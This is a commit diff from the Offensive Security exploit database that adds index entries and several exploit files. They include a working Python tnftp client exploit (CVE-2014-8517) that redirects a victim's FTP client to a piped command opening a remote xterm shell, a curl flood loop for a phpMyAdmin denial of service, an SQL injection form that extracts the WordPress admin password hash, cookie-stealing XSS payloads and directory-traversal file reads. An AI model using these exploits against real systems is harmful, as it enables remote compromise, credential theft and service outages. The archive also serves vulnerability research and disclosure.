Skip to content

Commit b4ae4f9

Browse files
author
Offensive Security
committed
Updated 12_16_2014
1 parent 8da471b commit b4ae4f9

21 files changed

Lines changed: 1587 additions & 1 deletion

File tree

files.csv

Lines changed: 21 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -31292,7 +31292,7 @@ id,file,description,date,author,platform,type,port
3129231292
34748,platforms/php/webapps/34748.txt,"Classified Linktrader Script 'addlink.php' SQL Injection Vulnerability",2009-07-21,Moudi,php,webapps,0
3129331293
34749,platforms/php/webapps/34749.txt,"CJ Dynamic Poll Pro 2.0 'admin_index.php' Cross Site Scripting Vulnerability",2009-07-21,Moudi,php,webapps,0
3129431294
34751,platforms/hardware/webapps/34751.pl,"ZyXEL Prestig P-660HNU-T1 ISP Credentials Disclosure",2014-09-24,"Sebasti�n Magof",hardware,webapps,80
31295-
34752,platforms/windows/dos/34752.c,"WS10 Data Server SCADA Exploit Overflow PoC",2014-09-24,"Pedro S�nchez",windows,dos,0
31295+
34752,platforms/windows/dos/34752.c,"WS10 Data Server - SCADA Exploit Overflow PoC",2014-09-24,"Pedro S�nchez",windows,dos,0
3129631296
34753,platforms/asp/webapps/34753.py,"Onlineon E-Ticaret Database Disclosure Exploit",2014-09-24,ZoRLu,asp,webapps,80
3129731297
34754,platforms/php/webapps/34754.py,"Joomla Face Gallery 1.0 - Multiple vulnerabilities",2014-09-24,"Claudio Viviani",php,webapps,80
3129831298
34755,platforms/php/webapps/34755.py,"Joomla Mac Gallery 1.5 - Arbitrary File Download",2014-09-24,"Claudio Viviani",php,webapps,80
@@ -31912,6 +31912,7 @@ id,file,description,date,author,platform,type,port
3191231912
35422,platforms/hardware/webapps/35422.txt,"IPUX CS7522/CS2330/CS2030 IP Camera - (UltraHVCamX.ocx) ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,webapps,0
3191331913
35423,platforms/windows/local/35423.txt,"Thomson Reuters Fixed Assets CS <=13.1.4 - Privileges Escalation",2014-12-02,"Information Paradox",windows,local,0
3191431914
35426,platforms/windows/remote/35426.pl,"Tiny Server 1.1.9 - Arbitrary File Disclosure Exploit",2014-12-02,"ZoRLu Bugrahan",windows,remote,0
31915+
35427,platforms/bsd/remote/35427.py,"tnftp - clientside BSD exploit",2014-12-02,dash,bsd,remote,0
3191531916
35429,platforms/php/webapps/35429.txt,"PhotoSmash Galleries WordPress Plugin 1.0.x 'action' Parameter Cross Site Scripting Vulnerability",2011-03-08,"High-Tech Bridge SA",php,webapps,0
3191631917
35430,platforms/php/webapps/35430.txt,"1 Flash Gallery WordPress Plugin 0.2.5 Cross Site Scripting and SQL Injection Vulnerabilities",2011-03-08,"High-Tech Bridge SA",php,webapps,0
3191731918
35431,platforms/php/webapps/35431.txt,"RuubikCMS 1.0.3 'head.php' Cross Site Scripting Vulnerability",2011-03-08,IRCRASH,php,webapps,0
@@ -31980,6 +31981,7 @@ id,file,description,date,author,platform,type,port
3198031981
35501,platforms/multiple/remote/35501.pl,"RealPlayer 11 '.rmp' File Remote Buffer Overflow Vulnerability",2011-03-27,KedAns-Dz,multiple,remote,0
3198131982
35502,platforms/windows/dos/35502.pl,"eXPert PDF Batch Creator 7.0.880.0 Denial of Service Vulnerability",2011-03-27,KedAns-Dz,windows,dos,0
3198231983
35503,platforms/windows/local/35503.rb,"Advantech AdamView 4.30.003 - (.gni) SEH Buffer Overflow",2014-12-09,"Muhamad Fadzil Ramli",windows,local,0
31984+
35505,platforms/php/webapps/35505.txt,"Wordpress Plugin Symposium 14.10 - SQL Injection",2014-12-09,"Kacper Szurek",php,webapps,0
3198331985
35506,platforms/php/webapps/35506.pl,"Flat Calendar 1.1 - HTML Injection Exploit",2014-12-09,"ZoRLu Bugrahan",php,webapps,0
3198431986
35507,platforms/windows/dos/35507.pl,"DivX Player 7 Multiple Remote Buffer Overflow Vulnerabilities",2011-03-27,KedAns-Dz,windows,dos,0
3198531987
35508,platforms/php/webapps/35508.txt,"Cetera eCommerce Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2011-03-27,MustLive,php,webapps,0
@@ -31992,3 +31994,21 @@ id,file,description,date,author,platform,type,port
3199231994
35516,platforms/php/webapps/35516.txt,"webEdition CMS 6.1.0.2 'DOCUMENT_ROOT' Parameter Local File Include Vulnerability",2011-03-28,eidelweiss,php,webapps,0
3199331995
35517,platforms/php/webapps/35517.txt,"pppBLOG 0.3 'search.php' Cross Site Scripting Vulnerability",2011-03-28,"kurdish hackers team",php,webapps,0
3199431996
35518,platforms/php/webapps/35518.txt,"OpenEMR 4.1.2(7) - Multiple SQL Injection Vulnerabilities",2014-12-10,Portcullis,php,webapps,80
31997+
35520,platforms/php/webapps/35520.txt,"Claroline 1.10 Multiple HTML Injection Vulnerabilities",2011-03-28,"AutoSec Tools",php,webapps,0
31998+
35521,platforms/php/webapps/35521.txt,"osCSS 2.1 Cross Site Scripting and Multiple Local File Include Vulnerabilities",2011-03-29,"AutoSec Tools",php,webapps,0
31999+
35522,platforms/php/webapps/35522.txt,"Spitfire 1.0.3x 'cms_username' Cross Site Scripting Vulnerability",2011-03-29,"High-Tech Bridge SA",php,webapps,0
32000+
35523,platforms/php/webapps/35523.txt,"Tracks 1.7.2 URI Cross Site Scripting Vulnerability",2011-03-29,"Mesut Timur",php,webapps,0
32001+
35524,platforms/php/webapps/35524.txt,"XOOPS 'view_photos.php' Cross Site Scripting Vulnerability",2011-03-29,KedAns-Dz,php,webapps,0
32002+
35525,platforms/php/webapps/35525.txt,"GuppY 4.6.14 'lng' Parameter Multiple SQL Injection Vulnerabilities",2011-03-30,"kurdish hackers team",php,webapps,0
32003+
35526,platforms/php/webapps/35526.txt,"YaCOMAS 0.3.6 OpenCms Multiple Cross-Site Scripting Vulnerabilities",2011-03-30,"Pr@fesOr X",php,webapps,0
32004+
35528,platforms/php/webapps/35528.txt,"GLPI 0.85 - Blind SQL Injection",2014-12-15,"Kacper Szurek",php,webapps,0
32005+
35529,platforms/windows/webapps/35529.txt,"Soitec SmartEnergy 1.4 - SCADA Login SQL Injection Authentication Bypass Exploit",2014-12-15,LiquidWorm,windows,webapps,0
32006+
35530,platforms/windows/local/35530.py,"Mediacoder 0.8.33 build 5680 - SEH Buffer Overflow Exploit Dos (.m3u)",2014-12-15,s-dz,windows,local,0
32007+
35531,platforms/windows/local/35531.py,"Mediacoder 0.8.33 build 5680 - SEH Buffer Overflow Exploit Dos (.lst)",2014-12-15,s-dz,windows,local,0
32008+
35532,platforms/windows/local/35532.py,"jaangle 0.98i.977 - Denial of Service Vulnerability",2014-12-15,s-dz,windows,local,0
32009+
35534,platforms/windows/local/35534.txt,"HTCSyncManager 3.1.33.0 - Service Trusted Path Privilege Escalation",2014-12-15,s-dz,windows,local,0
32010+
35537,platforms/windows/local/35537.txt,"Avira 14.0.7.342 - (avguard.exe) Service Trusted Path Privilege Escalation",2014-12-15,s-dz,windows,local,0
32011+
35539,platforms/php/dos/35539.txt,"phpMyAdmin 4.0.x, 4.1.x, 4.2.x - DoS",2014-12-15,"Javier Nieto",php,dos,0
32012+
35541,platforms/php/webapps/35541.txt,"ResourceSpace 6.4.5976 - XSS / SQL Injection / Insecure Cookie Handling",2014-12-15,"Adler Freiheit",php,webapps,0
32013+
35542,platforms/windows/local/35542.txt,"CodeMeter 4.50.906.503 - Service Trusted Path Privilege Escalation",2014-12-15,s-dz,windows,local,0
32014+
35543,platforms/php/webapps/35543.txt,"Wordpress Wp Symposium 14.11 - Unauthenticated Shell Upload Exploit",2014-12-15,"Claudio Viviani",php,webapps,0

platforms/bsd/remote/35427.py

Lines changed: 148 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,148 @@
1+
#!/usr/bin/env python2
2+
#
3+
# Exploit Title: [tnftp BSD exploit]
4+
# Date: [11/29/2014]
5+
# Exploit Author: [dash]
6+
# Vendor Homepage: [www.freebsd.org]
7+
# Version: [FreeBSD 8/9/10]
8+
# Tested on: [FreeBSD 9.3]
9+
# CVE : [CVE-2014-8517]
10+
11+
# tnftp exploit (CVE-2014-8517)tested against freebsd 9.3
12+
# https://www.freebsd.org/security/advisories/FreeBSD-SA-14:26.ftp.asc
13+
#
14+
# 29 Nov 2014 by dash@hack4.org
15+
#
16+
# usage:
17+
#
18+
# redirect the vulnerable ftp client requests for http to your machine
19+
#
20+
# client will do something like:
21+
# ftp http://ftp.freebsd.org/data.txt
22+
#
23+
# you will intercept the dns request and redirect victim to your fake webserver ip
24+
#
25+
# attacker: start on 192.168.2.1 Xnest: Xnest -ac :1
26+
# probably do also xhost+victimip
27+
#
28+
# attacker: python CVE-2014-8517.py 192.168.1.1 81 192.168.1.1
29+
#
30+
# sadly you cannot put a slash behind the | also www-encoded is not working
31+
# plus problems with extra pipes
32+
# this renders a lot of usefull commands useless
33+
# so xterm -display it was ;)
34+
#
35+
# *dirty* *dirdy* *dyrdy* *shell* !
36+
#
37+
38+
import os
39+
import sys
40+
import time
41+
import socket
42+
43+
44+
def usage():
45+
print "CVE-2014-8517 tnftp exploit"
46+
print "by dash@hack4.org in 29 Nov 2014"
47+
print
48+
print "%s <redirect ip> <redirect port> <reverse xterm ip>"% (sys.argv[0])
49+
print "%s 192.168.1.1 81 192.168.2.1"% (sys.argv[0])
50+
51+
#bind a fake webserver on 0.0.0.0 port 80
52+
def webserveRedirect(redirect):
53+
54+
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
55+
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
56+
s.bind(("0.0.0.0",80))
57+
s.listen(3)
58+
h, c = s.accept()
59+
60+
#wait for request
61+
#print h.recv(1024)
62+
63+
#send 302
64+
print "[+] Sending redirect :>"
65+
h.send(redirect)
66+
s.close()
67+
return 0
68+
69+
#bind a fake webserver on port %rport
70+
def deliverUgga(owned):
71+
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
72+
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
73+
s.bind(("0.0.0.0",rport))
74+
s.listen(3)
75+
h, c = s.accept()
76+
77+
# print h.recv(1024)
78+
print "[+] Deliver some content (shell is spwaned now)"
79+
h.send(owned)
80+
s.close()
81+
82+
return 0
83+
84+
owned="""HTTP/1.1 200 Found
85+
Date: Fri, 29 Nov 2014 1:00:03 GMT
86+
Server: Apache
87+
Vary: Accept-Encoding
88+
Content-Length: 5
89+
Connection: close
90+
Content-Type: text/html; charset=iso-8859-1
91+
92+
93+
ugga ugga
94+
"""
95+
96+
if(os.getuid())!=0:
97+
print "[-] Sorry, you need root to bind port 80!"
98+
sys.exit(1)
99+
100+
if len(sys.argv)<3:
101+
usage()
102+
sys.exit(1)
103+
104+
rip = sys.argv[1]
105+
rport = int(sys.argv[2])
106+
revip = sys.argv[3]
107+
108+
print "[+] Starting tnftp BSD client side exploit (CVE-2014-8517)"
109+
print "[+] Dont forget to run Xnest -ac :1"
110+
111+
# ok, lets use xterm -display
112+
cmd = "xterm -display %s:1" % (revip)
113+
cmd = cmd.replace(" ","%20")
114+
115+
print "[+] Payload: [%s]" % cmd
116+
117+
redirect = "HTTP/1.1 302\r\n"\
118+
"Content-Type: text/html\r\n"\
119+
"Connection: keep-alive\r\n"\
120+
"Location: http://%s:%d/cgi-bin/|%s\r\n"\
121+
"\r\n\r\n" % (rip,rport,cmd)
122+
123+
#child process owned data delivery
124+
uggapid = os.fork()
125+
if uggapid == 0:
126+
uggapid = os.getpid()
127+
deliverUgga(owned)
128+
else:
129+
#child proces for webserver redirect
130+
webpid = os.fork()
131+
if webpid == 0:
132+
webpid = os.getpid()
133+
webserveRedirect(redirect)
134+
135+
136+
137+
#childs, come home!
138+
try:
139+
os.waitpid(webpid,0)
140+
except:
141+
pass
142+
try:
143+
os.waitpid(uggapid,0)
144+
except:
145+
pass
146+
147+
#oh wait :>
148+
time.sleep(5)

platforms/php/dos/35539.txt

Lines changed: 42 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,42 @@
1+
=============
2+
DESCRIPTION:
3+
=============
4+
A vulnerability present in in phpMyAdmin 4.0.x before 4.0.10.7, 4.1. x
5+
before 4.1.14.8, and 4.2.x before 4.2.13.1 allows remote attackers to
6+
cause a denial of service (resource consumption) via a long password.
7+
CVE-2014-9218 was assigned
8+
9+
=============
10+
Time Line:
11+
=============
12+
December 3, 2014 - A phpMyAdmin update and the security advisory is
13+
published.
14+
15+
=============
16+
Proof of Concept:
17+
=============
18+
19+
*1 - Create the payload.*
20+
21+
$ echo -n "pma_username=xxxxxxxx&pma_password=" > payload && printf "%s"
22+
{1..1000000} >> payload
23+
24+
*2 - Performing the Denial of Service attack.*
25+
26+
$ for i in `seq 1 150`; do (curl --data @payload
27+
http://your-webserver-installation/phpmyadmin/ --silent > /dev/null &) done
28+
29+
=============
30+
Authors:
31+
=============
32+
33+
-- Javer Nieto -- http://www.behindthefirewalls.com
34+
-- Andres Rojas -- http://www.devconsole.info
35+
=============
36+
37+
References:
38+
====================================================================
39+
40+
*
41+
http://www.behindthefirewalls.com/2014/12/when-cookies-lead-to-dos-in-phpmyadmin.html
42+
* http://www.phpmyadmin.net/home_page/security/PMASA-2014-17.php

platforms/php/webapps/35505.txt

Lines changed: 35 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,35 @@
1+
# Exploit Title: WP Symposium 14.10 SQL Injection
2+
# Date: 22-10-2014
3+
# Exploit Author: Kacper Szurek - http://security.szurek.pl/ http://twitter.com/KacperSzurek
4+
# Software Link: https://downloads.wordpress.org/plugin/wp-symposium.14.10.zip
5+
# Category: webapps
6+
# CVE: CVE-2014-8810
7+
8+
1. Description
9+
10+
$_POST['tray'] is not escaped.
11+
12+
File: wp-symposium\ajax\mail_functions.php
13+
$tray = $_POST['tray'];
14+
$unread = $wpdb->get_var("SELECT COUNT(*) FROM ".$wpdb->base_prefix.'symposium_mail'." WHERE mail_from = ".$mail->mail_from." AND mail_".$tray."_deleted != 'on' AND mail_read != 'on'");
15+
16+
http://security.szurek.pl/wp-symposium-1410-multiple-xss-and-sql-injection.html
17+
18+
2. Proof of Concept
19+
20+
Message ID must be one of your sended message (you can check this on user mailbox page -> sent items -> page source -> div id="this_is_message_id" class="mail_item mail_item_unread")
21+
22+
<form method="post" action="http://wordpress-instalation/wp-content/plugins/wp-symposium/ajax/mail_functions.php">
23+
<input type="hidden" name="action" value="getMailMessage">
24+
Message ID: <input type="text" name="mid"><br />
25+
SQL: <input type="text" name="tray" value="in_deleted = 1 UNION (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- ">
26+
<input type="submit" value="Inject">
27+
</form>
28+
29+
Returned value will be between "[split]YOUR_RETURNED_VALUE[split]"
30+
31+
3. Solution:
32+
33+
Update to version 14.11
34+
http://www.wpsymposium.com/2014/11/release-information-for-v14-11/
35+
https://downloads.wordpress.org/plugin/wp-symposium.14.11.zip

platforms/php/webapps/35520.txt

Lines changed: 9 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,9 @@
1+
source: http://www.securityfocus.com/bid/47073/info
2+
3+
Claroline is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
4+
5+
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
6+
7+
Claroline 1.10 is vulnerable; other versions may also be affected.
8+
9+
"><script>alert(0)</script>

platforms/php/webapps/35521.txt

Lines changed: 19 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,19 @@
1+
source: http://www.securityfocus.com/bid/47074/info
2+
3+
osCSS is prone to a cross-site scripting vulnerability and multiple local file-include vulnerabilities because the application fails to sufficiently sanitize user-supplied data.
4+
5+
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, and open or run arbitrary files in the context of the webserver process.
6+
7+
osCSS 2.1.0 RC12 is vulnerable; other versions may also be affected.
8+
9+
10+
Cross-site scripting:
11+
12+
http://www.example.com/oscss2/admin108/editeur/tiny_mce/plugins/tinybrowser/upload.php?feid=%22);alert(0);//
13+
14+
15+
Local file include:
16+
17+
http://www.example.com/oscss2/admin108/index.php?page_admin=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00
18+
19+
http://www.example.com/oscss2/admin108/popup_image.php?page_admin=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00

platforms/php/webapps/35522.txt

Lines changed: 10 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,10 @@
1+
source: http://www.securityfocus.com/bid/47077/info
2+
3+
Spitfire is prone to a cross-site scripting vulnerability. because the application fails to properly sanitize user-supplied input.
4+
5+
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
6+
7+
[code]
8+
GET / HTTP/1.1
9+
Cookie: cms_username=admin">[xss]<
10+
[/code]

platforms/php/webapps/35523.txt

Lines changed: 9 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,9 @@
1+
source: http://www.securityfocus.com/bid/47078/info
2+
3+
Tracks is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
4+
5+
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
6+
7+
Tracks 1.7.2 is vulnerable; other versions may also be affected.
8+
9+
http://example.com/todos/tag/&#039;"--></style></script><script>alert(0x000238)</script>

platforms/php/webapps/35524.txt

Lines changed: 7 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,7 @@
1+
source: http://www.securityfocus.com/bid/47085/info
2+
3+
XOOPS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
4+
5+
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
6+
7+
http://www.example.com/[path]/modules/jobs/view_photos.php?lid=-9999&uid="><script>alert(document.cookie);</script>

platforms/php/webapps/35525.txt

Lines changed: 11 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,11 @@
1+
source: http://www.securityfocus.com/bid/47086/info
2+
3+
GuppY is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
4+
5+
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
6+
7+
GuppY 4.6.14 is vulnerable; other versions may also be affected.
8+
9+
http://www.example.com/links.php?lng=fr [sql Injection]
10+
http://www.example.com/guestbk.php?lng=fr [sql Injection]
11+
http://www.example.com/articles.php?pg=43&lng=fr [ sql Injection]

0 commit comments

Comments
 (0)